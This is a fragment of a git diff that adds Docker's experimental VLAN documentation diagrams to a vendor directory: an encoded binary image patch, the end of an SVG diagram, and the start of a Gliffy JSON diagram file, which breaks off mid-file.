zymFLDSD)iZNZ@Bf+=#r`t+hilrAJDneHKuurwiYSXq=pOt$0OS#H6qBhAhQK{u_xbl*gJZZGdYFlkn>Ys&Qn( zYVG5UZw}feXdn&wr!XSdi8}R6Tw|RQ&9Ym6-uHE*0$l}4C*OkIBu??oL7hwdL)IoSBB*R8Npahnzhc4b!tgvLS2o2 zTBl>?8SUah1Zwob3#$ik~fqlk!&e$)ydh zHnA*+)`U5eU8uTZPe!Brw&=-=HbvV(@BX#&|0+KYgLt&BlwC_xy0skCzX znZLO9skp03F}sKHN+&)nN#%<2>#Mvd_*H#E+^iZv0DQ~xx=X$91zn~-pRjz7ygbO< z@;e~+QgB-%6w|9zCs>}dzzLO@ROrm{h(z|W}+I28RQh#bHKL>C$FP( zysKRD(zYLRc|*-ixJb>w_BK*rh{@oK(-X?@sUctdRn{kr-XU2h2^J)?hId$t!WyO> zkMc9?-*Rb*8+%?u0eP$@UB)8jSZ2YU-3L|$(|n7;y!wvKFW0i--cL^O>lgj7YbrWb z42H0h71M5^Gv$0#*&=2<>CG;7au&oY_jAvE{5hMchsalPrjTvNNmS+#DMY^ataq+u z3rh$K|HZ)8_jZGcj5@$k@_U8PMk%!8B&=#ZhPQySrAbD#o`r@v!d!yVh6f+hE*Q^d zI*5Hfp8Q*dpT~zCS+a+aeg}pQuvOqft9ANcf;zSFSI{u;Kd4vJZkfm_%vo&75ekrq z8C{%Xw`uX^w@f-Jh6Ney?6W-R=wQxrwrmlkqBft+F-p4~MF(Jw0uUxr|3$#GLfkXd z^SCZBT{q~*+D1`bAPO`LvG0K0Lh;%i+&qAj9I~?fSOA5Dwo+$2xa9|i+5vB8uRlCP zI-J}J#@zBkU2d*+PdctPS7)>Do0@R0rM`#1f@+2vJud)l$+T@PD*v9}e{SPgYKcW- zdM;)b+%>wc?Cyk|eY!m0Gu}DPsXxA(d$QOq;oitTot7=Gi^IO=6@UhT@?39)uPx-1J`Os4e9@z2rmQrg zpVTmE^QR4wVm04w=`l`?oI})yow?Z+nMs(KTZDBIVxrWM(TB-70AfEliWk0edWuNq z_uDOmr36-nH!}F9_7QLpa)<@`J!fhipPE#LgRRNjnI@;9douW>DUQ!fr5uM@a(H4G zK2~B?@qIt5Skh2=qiPEWWOmA@M9yMzDaXgasOsE%6N50@Iz>@nbiA%E{RMOnWo)$e z5~j|PX&ZuHp`C1p5(1^&=o=e`OTUHQB1m@wMWfeb9}O`1bzVGtEy32|Cgd=#b&f{Oy+ z6*O<2DB!v2`F=S2`Res_Pl3Zi|3a=|UUfKXeVj(wImSB)Iui?yL*B?2;5va-VS|iq z939WEAZONQ1po}Iz<7-Jdp0f$4-8xRD7?_AwqIY5<>L@CGj4tkx~4$NWc)%sPt&N~qvk=b27kYF#3R=f3R6 zjhe(b)T6Z)GfZq-;9;tOnuk{Lp&c%8)(+7g^HwInMm-Q+&W52CNV53x6^5E`lg_B7PDr0APkyIFh-025+IhOK zYF&SH_mRT$qg zLSFMAkW+789n3H3{Ef@PhS>F}E5GQ@`t6lu(_iaVfcU`p(Nentf zA)7yK1krNUjpj0rN!h4!U z-re*S;|zDfG~im$Vcird>%{i*a2RwKRao_B z>B|cbi7kId^Ck5$qXpDyd~)snpTS>Wb||4{PrjTCM%T%6?i}}#Zk;XD*SlI~FyJ-w zGo-~ChiAPO89IyC9CnpbE%gC?RBQ`~8rguj5h$5edOsCl;4b(M@?wze*wp(B21On@kQuRuP$T zcaphyj@XJnKaL+G6ptvpT1FCA@qE~5g&_1)^5Knek^z zK+{*rErU0tCTxq|A?-;pFu;j5Ftg^x<7WW`G0L{>LLYFBcqMn;;eh z1^`+c@er_h3gHM<(|+o-T9#*bNSnd+L zQcN&90+Bz!+c@fD0ARjHi=Jb#m)9RKg4+w&iQ!!)kgIhDg1em?gld-MPfY@D{wURG zGO4*N*h%?q^@QU#HX`bu*1$VSGAiRJ-T;6!$o>U^F!hhUR9QqYnry0u2Gv-`SHK|j5pYZb;ubgZ3QGOtNlN&%6+S$qx&Zl25mP znzw_lw_}Ifntm^_qAaj1&60F^f2p$oa{2>i*Hi0=dGq5wn(+25p4ZKS`M@&0gkY9q zeZL!S^N0lhz41uR$Ka(gx1jru8vpG@>qMC;NNm0F+I=2kgMUp$ew;w<(L#Dn$?4kT z-zn~Ex0OZs2JQv7|HhF0i#Rt7Fgh4L*BmS%d^;MRFLUu>`l*)nwkyn|PxnDuY zGpO}ul99p=s+#_DQ*_U0xa_;JpA|~y!=yR5YJeW#L7)!K#S$Ke*a{m*tlh$Kx*4J} zOOjz$Gn?T@4R~cVH&YKYTU$!5FjVGmcU(u@x#WPr`pK=`D(^U?Oi#*VInO7J6-;$| z=M8R^$6tnW=Ke5VdzPGloQtjD|J#ZA)~0~NvxAfmcih(CQCX5K_F|t2_{ibWB^~-G zI4%f_nIrD>g?+q$~yTO{oSoY&%qqirY5sjACfNXvo8zz

b*{Hq>az{aEwl^vuL-ETW!AsvC0U0rmZ$_<6OOxU4rH z6u*cCCrj%CbZzu?LCU+fGt1_K0=ic0aiH8Tv(d}mzpAB)%@%6-6`Lyn zd;=aEyurlO2oEI|CPfQU*p&b-f0^7f+aySv?;0IYmhE8@&azM@s(W+tZ9c5e4!{sX zfiaPRB-x>31b(-@*OX3SfPO={;5>XR!!5^M3})_?`eW3RYLFL4dn&gCRlddq!UZp3 zAO=>+?ALa2%k{;xrD-8Kl++6_#b$F=O!pn7J1$t#B@!$C5)BfdlU5HN(yJrQ%j!dq}rfM(a$o8fv zTp~yzd4j8p6OX6R;`GAwKclI1Fc=V2d+jG|XGUoRj0-i(!+O4aQ6eJQWJVRWoER@>i z1n>F0IMxw9Tw>{kK1i)xicm&1#D5gu{o>fIFIqAt;KD8L+_HrIBbg;wPdL84HblQ)C+~sF>=()-`U*es#QL*>k3l!ZIIv@K;?LQ#Ty`{4Un&{&BHwE!4CHY8s zb9=V6y1JT|m)G4blMWT&;|nz-WC)pfM6;rDh2LXBA-h@)ttSbpP#BK2EA@3v!))k_I4*8zu-(cSeUL5Bkr5o$S)*>_9hh!9tbP63Ei-@-I*%W`U5q{cz|E*9v&Qg5%&dt z8!AqBkj06l=i^H)WY~-BjUhDa&H65JxDC=MS2hEuZ%EK2A?7il=<>wG#%6A#1e`7} zo5c3NGd9MIpFdt|q97+9fkL^>J9E;~(sFV}If_$KQp(F&<9&f+WOeBp)6DcfK(mM& ze>?Fg>6w+b&jHPHL|?21Nq6=$)R_j15nrFPD&Eh{H+?w}3v;%(RKEj$S!Mmq@NT8ky{N_Eq*cDRbAP`cP^8&pSqLb}@=d)^ojf1TGW= zuDwy*%gkJ?v!NjzhLx@$bKNNM;+5*d$YJ{zRg=C4TI5VM%m4OPr0(G0(9qICd@hXL z6;g5pN&P^^55gwB`9sbgRWKHhJBqdJyXfNrVPqfmezre`PZKHj!qWT@RALZRSPem- z5^p>^3k%wi;p4v4Z=Si@6@b5-guorPcC*_oI4o%WW^tQ)ge-JewU zoM=ex0>Ge^j5r+xnPav+yv)pKieCIzX%!U}w>)7m)}-_ukaFHzgi{wn7|G+5d1`x{ zr0MDDe;+en1TZl%d6)d(P0|sYq|2Usd$A8zE|HZaJf;mTq1MY{WzY(4=jWC?_Z)ui z@>{sQ6=vuSQ-CWdD5!~KaGABg4jtowUSD0oe{hF#+VlZ6_-BZIr3cSO`wR8M!;{5P z&L`WkhATD9p3M{ij5184NkCuY_wR=axPKtim(fa;f|ateva@{@{tu8YWZ2ay=;maF z@I8Y{2+_`OGnrC+00CB2FlwY`K?fuLs|<{990C|AWwK^5>2yB&!-s3o^|_v60eW*D zIjtPRgt>3DR2cA-q_psKZU(LJb|M7&gXFocbeWR(9K=jXv^Lt>+AmBjhJYXLEZjwN z+nG?T)i-~9YWJt}VS|-;lcg9Ywm)@XEfNnH|K<+Qy|wV4V^-iM73T;2p2BISVy&?R z+1aH=A{%|~ffA*ZDM)@p;7A)n;Gi}8<&9~TNoV)C((aRbW?*bgQDa%hL7|zz%%BzP zuZ%##mOR&z{*e+*!tvud{eI$Xe0+SIGM?-7tqIz>evMhj2x3da=m*aUR&H)TZ=~T$ zd9w*K#Vqo7GbmxG5D`KfMypV%*cRFuFp1Th#7&c_utafC6s0V@hnSEh6l=z zyt|W)LV62R*F7WzlgwF660sK-1E$zj*x_n>RjMHUIn zT8DC98iDbqIji4HQ0M-xXPE&3r(Lq+XgHPm=VWNyYhSJuNN)-bXyYYA4KX}?A-WZN zb>rEFp@zUGz?aO1V9cg zUQ<9y0QWk|6g3&X#u-3#Q6+3YbxzWQ4Ypf`Hc&YieLT8y*|r}!5T0qtpq1Oc+OD4C ziyrZ5{q-B}`y>Zb62pg))goLh&hEpb72S9zFOnb6KRi8D{r<8C1+?27}e0s3aI$1Q*m6Z`| z$9mVvQ^)P17IbJq=TXIentF%@*UeafK^jUZM zY%xzfxFw$W;#g%ScC@RLJViv{{DLp_=ziV&AZ?_bDw%!_85R^+K&$c+cC`b7;gf^! zdkf+K++yzA!7U(VlTN^zS(Dh!w$apvnxHq?H_9PLvkrmBv6taxYGR@0E&bY$Jxn`^ z=%9sJCCM_P>1ycq+bfLYH{4p6!&4Tkb*@^gP_cSk(^iEz7E+LhakO54^8zbDujJO_*>BO_v$z zj4LH+Ds`DR|4;;TMfm!oSDjZ-&`LOgx+g|WEv+_0b z`B9yb=ef5Ik~F%XVxI9y;y5N!Nll=ggAuL{8xrbj76_0td5R|R>l;2Cfzn=3!d;Tg zH0#m>fYa6$rzGjzU3HJ%hU1Bn!%yO6*k-7#&+0A@tKgsc{ck9_A!uFh7yJE-kH^XH zthZn0>y9|4+em&Hl=vTnhm_+q(-x^$JEaDWqgv>riK>>G`411%0U!7QNTNZop)^vXVh`0e*yCO;tD%bx59ow#0oplpi`6f zY~gW~ldgiAr6oZJSpww3S40G^TrRSUENHG~msvj@=;JJ-b1j`ZSji?Ee zLTl2nAyhWMHZ3iUzksZ{!}?{2zVfqu5>Y~5@~9WF(^_a;b~E&z=QvCjw|5WNejE?; z{%reMvCHi`dto8d?R}82^=I3&WL#s(LB292YEg%0BERP|DVnt?s>gftiWB$s=Nbvd z=SUbyI<#ttj~x{S{u2T!Q2RFLG*^wk1i9**7zqh7h@5Gl>9xo#|6N~n$3bb;6VgFN zUzJ8^$nWgB*Ikyg?flq8)>h{1cvk?-rpolPY!0(GM!SOzXP)Y2)R$YiF3cd026Zgt zC$-2(vYvx-rJwev4#xy9N*bz{jirO3CfZV~CgeytlXU)Ef;V1Vt6J?s=q7 z=djU<1Y;vHrhH(A>JE~{)8;^F*eLe7O7b%gL#p|Ep;tpwO&~;P>{6;M#4_XfS--bT zEYZIdr}5mCRMMM&O}DlQ6Ni^>a7I$R%&KRyH7)Pr_G{OY?5)>8+e3}RjDg&&Hhxi12ACsFKf`f z7oYv-$yT{+T$4%p1=MQOd3No39a3SnDEYVOLS7{rc{wd@iSWE>-p@m$%r#o02ziO% zxSH&+4z!y~N?Q zoNX(k9_6Cxns2M!L>{r^m_I8Tcf zb}|n5Q3iXZAGJYRPf|ojKYn^}?zDp~9{^7qdg++dm&hou72(25PwkVg{v+vvH1|(V zZTY~N<{za>gyBEcYJXDDYhUqd5=9N`TIFpYkmjC}Wv0L1QF^n3MhFlZVwMZM8>jvG zc8j=_#^DgaDeevn1;A16ClmhZUAZw+BJO|7GvJ0_=j9@hPU0u26PbDX zQwosiGyh(|WsVhbh7B7VSM#^2+bq^7=g9m=hABYDPgecGAu$(OENNcD;k)pY6W93} z{o=)u5!DB6WD$7xgnuu7CS28A_MgzhT{@DDctf8{@&8fwUBv4B?w2@UQwv)(U58s+ z>L-e-FMaZbnb5scP*iU^!5_+F|`*or!y+O+GPRrl6W9d9hq!*i@F(^6WPi+`|1oe#XHM#V8H?3VEHJp-9MA2BWM&*oupsHc!G$ zIl7T+C&KU#W><18`npZ12wP^0?we&E%f*<#SDY9E*M>ei&)MOq5yfCnX@Y`f~9Nw$HcbW(91%)zevdoylqjmA@%P2At{~42)X&EiW?+*+-4v4Ycp!@dWvw zDgBqLm`+2=~Fdb&CFawyt!AknMLEA8XK%Aupv%7KBaJv3dUU~F zDnhkLRK0fs$mi3UOTj*Aqy7ON6&X^UKXq(73j#;3Um*(6a7w=Eb&`O@KbAb|FG5l5 z@1^u!`!0@ondd;Z;zY&k>0abQ{OZ~A%;vBnGk7d#l4-^k?+a$ESC=ES;2A|LIw+sG zov|H??43x6y?*(tHMoJ0&o49co4MN#Rz_Y6vX6e z-(5!8HguEgP@N24RWa6d`e#;0fe(FSLq%Bx^b6%W3e2L;B^-)861&F4|)pMSa)fA5d%70C71M6))P z@6i^+GmhDfM`)-_;NQtQtm#tp>BTTUxJM5ND88t#K~=eB4*1M?e{-tjjU*7!-i@fI z1OK@F9K%`!K$E_XgkzH6ncXhYx+T$6AO;}gM<%e&Bg)$WXxf1q8@o*ynQp zYOfb;D0%56T7))UhDk!_V{bZDXuC|Hatfm5`Sk|heaUkQ4+GhwK!Ady$P(q>(9pkb zXk=u>^>o|eHA?VUb+Q?^S-X9b&=9V~`K1fl4;eWigu`zNPn6y5&tIe;*}Ov(ut@TM zQG6T}*(ppat0YdXMG1(TCjEyY5rKi}HS#1o;&8mf4~Y}wxFj4D1pp`?RzP^Q*`u1^ z+7CH=y)dE^(W%v>rJTa3etdjF^$1sc`vS!2@rb?P}6)hsEi*@mn$*rsZ z*JfPQrK6anuKW4(vrA?lGMd2=a|$k6h-LJAAtTMlC75cSiZj&6P7!sI%c0aCFCn&_ zaw0M}v%sR}WI`hFLD>DRdboJN4l-IZz@+>2#LXSmU)?JFXaW!aQqmm<)w~WAnW$&8 zO06QprL)YG)PHgvYRjT^Cx2nrbs!rfMl1Wtp(E@8wGf-nc%bO#NzDYpej0D?x4Vl5 z>m)%{(S?aP5eP~xF_48ah}6gc{lcH2I-?jlkMGVt+md@3Yx}V)kSbG6R&v++l4&6SN}?GZ zRdZTx5P5hf?(j7jkpe_LZf8E*#8~F#!JL+s`~$ggf;}>kXtlZ;G5`Fg%3Njq=b<&l zU>uvr=7(hE?<{hSeL-8xBbhI9>Yytcel^R1t$?rf&cX~r`L^i=o=O^IOom_Dd{qUJ zail2X-MQHDJkJBL`vp2MOTG)`p?pgp>l(&y%MI_{_LSQNCk`w3YSyDK0DjbJ@_kjH z;~sf4NKJJ26B_xmzpX--4KG(+W{l;!bSMkmne469Ugk|SEIl8^SpJSU@$a*kq(bN30OYWo%wjL35S$m2|v-vCEV z9;fQiEDv%U61L=z%FBOS5sN7^W_wf@xm}`e6~Qx(V3xYgj5KlI_KNU67`+1Y1GMbU zJCM?69K(%tleG#o%!G9113xSRR8o@6+FDyr)PDtYxdf^ND7r|>3+m2t;eOlHAbwrs zbw8)tp{`?#N>Hy>Vw#I7(z02B0x^N^}%SwYLlWp@+i|) zatj!bQnjjCdTV?pg>rnxS44WT0OEQfm>^wgO2=?0i6_}Y_~e$TTEI%|SPD1@R>bq< zg2`!ar%7_C%Kl<)qLZQSw{jsf^Jc+~V#S-%V{$ng&!1vV3q-tD?feCew$g(`diU5! zW=HzyUb}&!#!sNpq;x+tBf*c`0eX-_G$KL-Wq=;r!YaE6?I+d zJP4v zYwZ20rc)i-xvV)D@&Z76bEK3vf9%rU&<65}(H%_@)zH<-)#%-2Dn595eqv$TAnBkM z^?WTC_!ofY$wQ{V_+6uP$VBR2BBM`Sg;4ED@K2Etf1mSu{D-HS(;C?LO{??a92!_V z^fEQ&{q6@vX}el^h4NG4kf=6kDcv)sPjqb5d5K=xaT0#lv=c#($wC>ad^E@~Mm@Gg z*#Dobs?9oLE`6UK;Mo!1-gn+^VhULP-@Na-+)QVz4a;9j(o@sY!kuLImJ|A44rgn` zIu*tSH};M!Wk)1otS&LGhX;^ipQFMHRsVIpn(Nv(l(f-B@=!QB7Ef`Ftz2%qq+RF( z?YerZIHz%hxh0M{&AUy=+ar(f#0%E`)axho@(%&|?>IU;FY$xcE`Odt=|Q8V#;qCF^rc~|!; z$03QC1fa!sN2;rnk3x_e@|#I(4czUYba3DZ(ZWR-w~yzV%!jnS zI=|~Z2r@9^K6cOV9SQpw{wF37N%lAT=kQO~$#=au6eB#p?KtpWTcCmd!iM34ElUM` zT%NWTfA6=o639Q!#xt%X%4G|l@4IemhMEa^QItX%L_qY$Ma<64;qt#U2v=WU9$EjA z9y*uPxeXDO#I3#AAZpSPWa_)nnPJ12t%$=BrW6EHBz%c#iB`PC#H;UpUmx|IqEa}R z7rrqO^$_=QQo2H5f_61(&4qg)TW+IrnFGPhZ{~x4OK4gEcN(vBVXo1T=ck8fCUp6g%z?@m#P*^>KMXZd7=E>JyreSU^X zm&dee)0)ofFnxNm&F9I#?R$;Wa-}&AZ>SGmSY7Xaa?bw=^DkUntS0V%@Z1ESqs_;8 zB%Kt!IXVxTp73@|usNa7{M#zezDcJxbX|GuADdvInV)}7{OoD<@}Bi=_79OW>$m?g z`@eA2+2Y#lhUZV79p>-|Dl~EXVb}it@|S0quN(C$Xw0z|zW3|pzC7=e*S+%Ht15O} z@PGbzli_EFo6LXr8F5J6UioSE_0JD~Z_+CHU^$2X`F*{(@yrtv}nS5&!vBR_42NAzV-A%y8Q(dUenH`-^_q-7HNxz5MeY)8FOa zr*FOXrR@Ixx_i}SR>BV~r~Y)K1J1J{=R9QKWpYm{_9*M9=UPf z#iNJjFFzo6UDuJ@{{7O=r)w`>J9m0ZzP{XlyB||7|J(VuaDhQ-V3hUo-W%6agW2V_ zWJdk46ezQe-oO8ud;g7vb(?Rxn7;qL{e#Wx+}mI`=qZ5}=ncW#H{L8@?Uj_5D>q|nKA5%jk{U=wX7;6)2FF{BBqTqj@vwYd~H*~w%fp*k;|sH>+@1|w*I$?a-V1P zd+48%X}y>+<)EMxODP*S$b{vqQy*sV>MiBYSk->?!91O=^h+_kcTZn8ykpo_c_!IT zX|G7RN!Ox^y1HxWv*+ip+-container1 -vlan10192.168.1.2/24eth0 -802.1qtrunkNetworkRouter (gateway)vlan10 -192.168.1.1/24vlan20172.16.1.1/24vlan3010.1.1.1/16eth0.10eth0.20container2 -vlan20172.16.1.2/24container3 -vlan3010.1.1.2/16eth0.30DockerHost \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy new file mode 100644 index 0000000000..4d9f2761c4 --- /dev/null +++ b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":566,"height":581,"nodeIndex":500,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":-3,"y":-1.0100878848684474},"max":{"x":566,"y":581}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":-5.0,"y":-1.0100878848684474,"rotation":0.0,"id":499,"width":569.0,"height":582.0100878848684,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":103,"lockAspectRatio":false,"lockShape":false,"children":[{"x":374.0,"y":44.510087884868476,"rotation":0.0,"id":497,"width":145.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":101,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network & other

Docker Hosts

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":157.40277777777783,"y":108.18042331083174,"rotation":0.0,"id":492,"width":121.19444444444446,"height":256.03113588084784,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":99,"lockAspectRatio":false,"lockShape":false,"children":[{"x":-126.13675213675185,"y":31.971494223140525,"rotation":180.0,"id":453,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":57,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.4915197649562,-156.36606993796556],[-121.49151976495622,-99.52846483047983],[-229.68596420939843,-99.52846483047591],[-229.68596420939843,-34.22088765589871]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.82598824786317,"y":137.23816896148608,"rotation":180.0,"id":454,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":55,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.05455395299924,191.93174068122784],[291.05455395299924,106.06051735724502],[186.27677617521402,106.06051735724502],[186.27677617521402,69.78655839914467]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":332.0100878848684,"rotation":0.0,"id":490,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":97,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":9.5,"rotation":0.0,"id":365,"width":141.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":98,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Parent: eth0.30

VLAN: 30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":342,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":96,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":332.0100878848684,"rotation":0.0,"id":489,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":92,"lockAspectRatio":false,"lockShape":false,"children":[{"x":1.0,"y":10.5,"rotation":0.0,"id":367,"width":138.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":93,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.10

VLAN ID: 10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":340,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":91,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.40277777777794,"y":126.43727235088903,"rotation":0.0,"id":486,"width":121.19444444444446,"height":250.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":88,"lockAspectRatio":false,"lockShape":false,"children":[{"x":236.18596420940128,"y":158.89044937932732,"rotation":0.0,"id":449,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":53,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.49151976495682,-152.05853787273531],[-121.49151976495682,-81.64750068755309],[-229.68596420940125,-81.64750068755139],[-229.68596420940125,-33.27817949077674]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-179.77677617521388,"y":56.523633779319084,"rotation":0.0,"id":450,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":51,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.0545539529992,186.6444547140887],[291.0545539529992,117.79470574474337],[186.276776175214,117.79470574474337],[186.276776175214,67.8640963321146]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":447.0,"y":150.01008788486848,"rotation":0.0,"id":472,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":87,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":473,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":86,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":474,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":84,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":475,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":82,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":101.71008483311067,"rotation":0.0,"id":477,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":80,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","line